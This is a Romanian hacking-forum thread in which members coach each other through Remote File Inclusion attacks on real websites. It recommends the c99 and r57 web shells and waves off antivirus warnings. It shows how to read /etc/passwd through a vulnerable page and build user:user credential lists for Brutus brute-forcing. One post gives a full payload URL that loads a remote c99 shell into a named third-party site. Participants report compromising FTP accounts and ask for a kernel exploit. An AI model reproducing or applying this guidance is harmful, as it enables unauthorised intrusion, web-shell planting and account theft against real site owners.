Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
Cosminamoraru
 | Femeie
25 ani
Bacau
cauta Barbat
30 - 80 ani |
|
|
NkE
Membru nou
Din: Ironforge
Inregistrat: acum 17 ani
Postari: 7
|
|
Am incercat mai multe siteuri de gen
Code:
index.php?page=blabla.php |
Am inlocuit blabla.php cu
Code:
www.site.com/index.php?page=http://google.ro |
Dar a ramas la fel. Asta inseamna ca site-ul nu este vulnerabil? 
_______________________________________
|
|
| pus acum 17 ani |
|
|
Zero_Cool
Pe lista neagra
Inregistrat: acum 17 ani
Postari: 796
|
|
NkE a scris:
Dar a ramas la fel. Asta inseamna ca site-ul nu este vulnerabil? |
|
|
| pus acum 17 ani |
|
|
Zero_Cool
Pe lista neagra
Inregistrat: acum 17 ani
Postari: 796
|
|
uite c99shell
si uite r57 (cred ca e in rusa, da poti sa modifici limba din shell, cauti ceva de genu ['RU'] in loc de RU bagi EN :zzz
|
|
| pus acum 17 ani |
|
Hooligan
Old School Member
 Din: Zion
Inregistrat: acum 17 ani
Postari: 461
|
|
NkE a scris:
Oo da , multumesc :* 
r57 mi-l gaseste ca Trojan . |
si pe c99 tot il detecteaza ca virus dar i-al cu incredere ca nu vei avea nici o problema
_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| pus acum 17 ani |
|
Shocker
Super Moderator
 Din: localhost
Inregistrat: acum 17 ani
Postari: 2084
|
|
|
| pus acum 17 ani |
|
dark_fabian
Old School Member
 Din: Giran Castel Town
Inregistrat: acum 17 ani
Postari: 485
|
|
frate cum imi pot baga in mozila faza cu c99 sa o am intr-un patratel?
Modificat de dark_fabian (acum 17 ani)
_______________________________________
|
|
| pus acum 17 ani |
|
Dynamyc
Elite Member
 Din: de peste tot
Inregistrat: acum 17 ani
Postari: 836
|
|
cred ca te referi la bookmark
daca da , faci asa: sub adress bar apesi click dreapta si dai new bookmark
LE: la Mozzila Firefox
Modificat de Dynamyc (acum 17 ani)
_______________________________________
|
|
| pus acum 17 ani |
|
dark_fabian
Old School Member
Din: Giran Castel Town
Inregistrat: acum 17 ani
Postari: 485
|
|
a da ms mia mers  ce pinguiin is
_______________________________________
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
 Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
E vulnerabil site-ul dar nu la RFI. Un site nu trebuie sa fie vulnerabil la Remote File Inclusion ca sa poti face ceva. La fel de bine iti poti face treaba si daca poti include fisiere din interior. Problema e sa iti folosesti capul si sa inveti sa folosesti sistemele UNIX asa cum trebuie.
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
Tzeus
Senior
 Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Da e vulnerabil totusi ce ar tb sa facmai departe? Pentru ca parolele nu se afla in fisierul /etc/passwd. Am doar userii. AM intalnit si eu cazuri. Si mai e ceva...am vazut un video tutorial postat aici pe forum. Si invidul de acolo face de /etc/passwd si intra apoi cu Brutus.In tutorial el foloseste un script perl pentru. Scriptul ia un text de genul
root :0:0:root:/root:/bin/bash bin:1:1:bin:/bin:/sbin/nologin daemon:2:2:daemon:/sbin:/sbin/nologin
iar la output are root:root. L-am cautat pe net dar nu am gasit decat o pagina in rusa care ar fi dat niste explicatii...iar eu rusa nu stiu.Nici programare. Stii despre ce este vorba?. Scriptul se numea pars.pl.
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
Dupa cum am spus trebuie sa stii sa folosesti sistemele UNIX. Gandeste-te cu ce te ajuta ca ai acces la /etc/passwd sau la alte fisiere care tin de securitatea sistemului iar apoi gandeste-te cum ai putea sa te folosesti de asta.
Gandeste-te ca ai cativa useri reali acolo. Pune-ti problema cati din ei au parole aiurite (cum ar fi userul sau numele lor). Fa rost de un cont. Nu conteaza ca toti au la shell /sbin/nologin, pentru ca au acces la FTP si odata ce ai urcat un C99 in /tmp faci tot ce faceai si cu un C99 urcat remote. Pune-ti putin mintea la lucru.
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
dark_fabian
Old School Member
Din: Giran Castel Town
Inregistrat: acum 17 ani
Postari: 485
|
|
OSHO esti tare frate
_______________________________________
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
@OSHO Esti intr-adevar tare  . Dar ai experienta. M-am gandit deja ca un user de acolo s-ar putea sa aiba o parola aiurita si as putea sa fac rost de un cont si chiar daca este nologin pot sa il folosesc ca ftp. La faza cu c99 nu m-am gandit. Din experienta vin si idei. Nu m-a interesat sa dau cu brutus sa vad daca are vreo unul parola aiurita, in primul rand nu l-am gasit eu .
De faza cu parserul ala stii ceva? Ca m-ar ajuta tare :|.
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
Mersi de aprecieri. Intotdeauna sunt bine venite
Din cate am inteles, e un script care pregateste un fisier pentru un program de brute-force. Programele de brute-force care sunt cat de cat respectabile pot primi un fisier de forma user:parola ca sa testeze conturile. Asta face si scriptul respectiv. Pentru cazul de fata le poti face si manual ca nu e mare lucru. Daca ai mai multe inregistrari si nu vrei sa faci manual ai putea sa folosesti o combinatie de cat si awk:
Code:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }' |
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Mersi! Stiam ce face voiam doar sa stiu cum  . Si daca sunt 20 de intrari nu e o problema le fac manual dar daca sunt 100?
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
Sinnerman
Grand Master
 Inregistrat: acum 17 ani
Postari: 322
|
|
OSHO a scris:
Daca ai mai multe inregistrari si nu vrei sa faci manual ai putea sa folosesti o combinatie de cat si awk:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }'
|
Modificat de Sinnerman (acum 17 ani)
_______________________________________
Toate drumurile care duc in iad sunt drumuri cu sens unic.
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Chestia asta am facut-o asha:
url/page?=/etc/passwd
Deci acces la sistem nu am ca sa pot da:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }'
Si ca tot vorbeam de cazul in care gasesc asa o pagina cu vreo 100 de linii. Am gasit una am copiat toti userii intr-un txt si are 1.67 MB.
Noroc ca am instalat cygwin. Totusi cum fac sa imi creeze un fisier in care scoate outputul?
Modificat de Tzeus (acum 17 ani)
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
Tzeus a scris:
Chestia asta am facut-o asha:
url/page?=/etc/passwd
Deci acces la sistem nu am ca sa pot da:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }' |
Nu trebuie sa ai acces la sistem ca sa poti rula comanda respectiva. Fa rost de un shell (unu free, sau un LiveCD). Iei liniile din browser si le salvezi intr-un fisier text, intri in shell si inlocuiesti /etc/passwd cu fisierul in care ai salvat userii.
LE: Acum am vazut ca ai modificat in timp ce dadeam reply. Foloseste redirectarea iesirii:
Code:
cat /etc/passwd | awk -F: '{ printf("%s:%sn",$1,$1) }' > final.txt |
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Stiam eu ca era ceva de genul asta dar uitasem. Thx OSHO!!!
P.S. tu ai ceva cu avatarurile de genul asta. Am mai vazut si in alta parte )
LE:
Am facut exact cum ai spus tu. Totusi am o nelamurire. Daca dau cat final.txt mi le afiseaza cum trebuie. Daca dau oepn cu notepad din win mi le arata in linie dar separate de un "patratel". Ma poate incurca asta daca fac bruteforce cu brutus?
Si inca ceva. Vreau sa fac un alias pentru toata comanda asta cu "cat fisier | awk -F...."
Problema este urmatoarea Daca am mai multe fisiere trebuie sa le redenumesc pe fiecare. Se poate sa bag o variabila in alias pentru fisierul sursa si una pentru fisierul final?
Ceva de genul asta:
alias comanda='cat $fisiersursa | awk -F: '{ printf("%s:%sn",$1,$1) }' > $fisierfinal'
iar comanda sa fie: comanda fisiersursa fisierfinal
sau trebuie sa fac un script separat care sa faca treaba asta?
LE: Si daca au la shel /bin/false ce inseamna?
Iar daca au la shell /noshell e acelasi lucru ca si nologin?
Iar Brutus nu imi merge. In momentul in care ii dau start se inchide.
Modificat de Tzeus (acum 17 ani)
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Ok. Nu vreau sa folosesc dublu post dar nu stiu de ce nu pot sa dau modifica. Am luat cateva conturi de ftp care au user indentic cu parola. La unul din servere a mers sa ma conectez cu Telnetul. Avea Debian 3.1 kernel 2.4.32 Am cautat un exploit dar nu am reusit sa gasesc pana acum. Poate sa ma ajute cineva? Brutus imi da multe erori. Si nu orea inteleg eu ce zice acolo...Am citit si Readme si un FAQ+inca cateva docuri de pe net dar nu m-au lamurit cu mesajele de eroare cum ar fi
Warning! Too many consecutive errors aborting attack
Last Error was: Authentication Sequence Error due to unexpected data in username prompt
Sau
Warning - (Due to unexpected data in username prompt).
Deci raman cele doua probleme la care nu stiu raspunsul inca:
1. UnXploit pentru Debian 3.1 kernel 2.4.32
2. Ce cauzeaza erorile la Brutus?
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
Vai, da' multe intrebari stii sa pui 
OK, hai sa incerc sa iti raspund pe rand.
1. In windows iti arata diferit din cauza ca in UN*X linia unui fisier text se termina cu LF (Line Feed) iar in Windows si MS-DOS linia se termina cu CRLF (Carriage Return & Line Feed). Pe mac doar cu CR. Din cauza asta un fisier text facut in UN*X il vei citi din Windows ca un rand lung cu tot felul de patratele - LF, daca nu este si CR nu il detecteaza ca rand nou. Daca incerci invers, sa iei un fisier text facut in Windows si sa il deschizi in UN*X vei vedea ca apar randurile noi (citeste LF-ul) dar apare un caracter in plus la fiecare rand (CR-ul). In principiu poti folosi cu brutus fisiere facute in UN*X. Daca nu merge, deschide cu Wordpad si "Save As".
2. Mai bine fa-ti un shell script. De exemplu:
Code:
#!/bin/sh
sursa="$1"
cat $sursa | awk -F: '{ printf("%s:%sn",$1,$1) }' |
Il salvezi ca shell.sh, ii pui permisiunile corecte (chmod 755 shell.sh) si apoi il rulezi dandu-i ca parametru fisierul care te intereseaza. Daca ai passwd, ii dai: ./shell.sh passwd > final.txt
3. /bin/false e acelasi lucru ca noshell sau nologin. E un soft care nu face nimic. Cand te loghezi, iti inchide sesiunea.
La brutus si la exploit nu ma bag. Nu le-am folosit de mult timp si mai bine tac decat sa vorbesc prostii.
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
M-am prins de ce nu puteam sa dau modifica ). Nu eram Logat, eram pe celalat comp . Problema cu LF/CRLF am rezolvat-o deschizand fisierul cu Wordpad apoi stergand cateva caractere si salvand. . Cu shell scriptul am luat-o babeste, amfacut unscript incare am bagat:
Code:
#!/bin/bash
cat sursa1 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput1;
cat sursa2 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput2;
cat sursa3 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput3;
cat sursa4 | awk -F: '{ printf("%s:%sn",$1,$1) }' > fisieroutput4; |
Caut in continuare unexploit pentru Debian3.1 cu kernel 2.4.32
Mersi OSHO pentru raspunsuri.
Modificat de Tzeus (acum 17 ani)
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
|
| pus acum 17 ani |
|
weaver
Grand Master
 Inregistrat: acum 17 ani
Postari: 208
|
|
AM facut asa cum mi-ai zis ,dar mi-a aparut codul in pagina vulnerabila doar fara sa aiba vre-un efect. Pls spune-mi unde gresesc si scz ca va tot sacai cu RFI dar nu inteleg unde ii buba
_______________________________________
Catre :Google
|
|
| pus acum 17 ani |
|
weaver
Grand Master
Inregistrat: acum 17 ani
Postari: 208
|
|
scz poza
51.2KB
_______________________________________
Catre :Google
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Ia incearca asa:
Code:
http://iaald.org/cee/index.php?page=http://shockingsoft.uv.ro/c99.txt? |
Poti sa urci c99.txt numai sa ai grija ca in "coada" sa ii pui "?"
Modificat de Tzeus (acum 17 ani)
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
Shocker
Super Moderator
Din: localhost
Inregistrat: acum 17 ani
Postari: 2084
|
|
|
| pus acum 17 ani |
|
Tzeus
Senior
Din: Pat
Inregistrat: acum 17 ani
Postari: 129
|
|
Nu stiu sa explic exact. RFI se bazeaza pe o vulnerabilitate in metoda $_GET din php.
in codul php vulnerabilitatea este:
Code:
require($page . "page.php"); |
pentru a nu mai fi vulnerabila la RFI ar tb sa se faca asa:
Code:
require("page.php"); |
Eu am impresia ca rolul acelui "?" este de a executa scriptul php, in cazul de fata ffind vorba de c99.txt.
Sper ca am fost de folos si ca am explicat bine
Modificat de Tzeus (acum 17 ani)
_______________________________________
"Einstein would turn over in his grave. Not only does God play dice, the dice are loaded."
-- Chairman Sheng-ji Yang, "Looking God in the Eye"
|
|
| pus acum 17 ani |
|
dark_fabian
Old School Member
Din: Giran Castel Town
Inregistrat: acum 17 ani
Postari: 485
|
|
frate mie imi merge sal rezolv cu c99
_______________________________________
|
|
| pus acum 17 ani |
|
crysty
Little Kevin
 Inregistrat: acum 17 ani
Postari: 71
|
|
am si eu un site...care cred ca este vulnerabil...dar nu stiu ce tre sa fak mai departe pls...help mee ..ms anticipat
Modificat de crysty (acum 16 ani)
_______________________________________
...::::[[-- --]]::::...
|
|
| pus acum 16 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 17 ani
Postari: 461
|
|
nu este vulnerabil daca era vulnerabil iti apare google
_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| pus acum 16 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
|
| pus acum 16 ani |
|
crysty
Little Kevin
Inregistrat: acum 17 ani
Postari: 71
|
|
aha...am gasit altu`..care mi se deschide google...am intrat...dar nu stiu ce sa fak ) ca sa il modific...
Modificat de crysty (acum 16 ani)
_______________________________________
...::::[[-- --]]::::...
|
|
| pus acum 16 ani |
|
|
tw8
Elite Member
Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
|
|
NU schimba nimic in el.
Daca vrei sa te ajutam, da-ne site-ul si poate iti face cineva un tut video.
Dar sa nu schimbi nimic in el...
_______________________________________
|
|
| pus acum 16 ani |
|
crysty
Little Kevin
Inregistrat: acum 17 ani
Postari: 71
|
|
_______________________________________
...::::[[-- --]]::::...
|
|
| pus acum 16 ani |
|
|
tw8
Elite Member
Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
|
|
Read Only.
_______________________________________
|
|
| pus acum 16 ani |
|
crysty
Little Kevin
Inregistrat: acum 17 ani
Postari: 71
|
|
ma poti ajuta? cum pot sa modific ceva? pls
_______________________________________
...::::[[-- --]]::::...
|
|
| pus acum 16 ani |
|
|
tw8
Elite Member
Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
|
|
Ai vazut ce am scris mai sus?/ Cred ca nu...ai acces la site read-only...deci nu poti sa faci nimic.
_______________________________________
|
|
| pus acum 16 ani |
|
crysty
Little Kevin
Inregistrat: acum 17 ani
Postari: 71
|
|
aha ms ma apuc sa caut altu 10x
_______________________________________
...::::[[-- --]]::::...
|
|
| pus acum 16 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 17 ani
Postari: 461
|
|
frate mai documenteaza-te si tu ca prea le vrei pe toate mura in gura cum nu stii ceva cum fac , cum dreg .... ai 23 de posturi dintre care 20 numai intrebari nu asa o sa ajungi sa fii un "hacker" din intrebari care le pui reiese ca nu ai rasfoit si tu un pic forumul pt ca aici sunt explicate pas cu pas tot ce ai cerut tu pana acuma deci mai intai cauta si pe urma intreaba asta in cazul in care nu gasesti
_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
| pus acum 16 ani |
|
sa va explic:
:
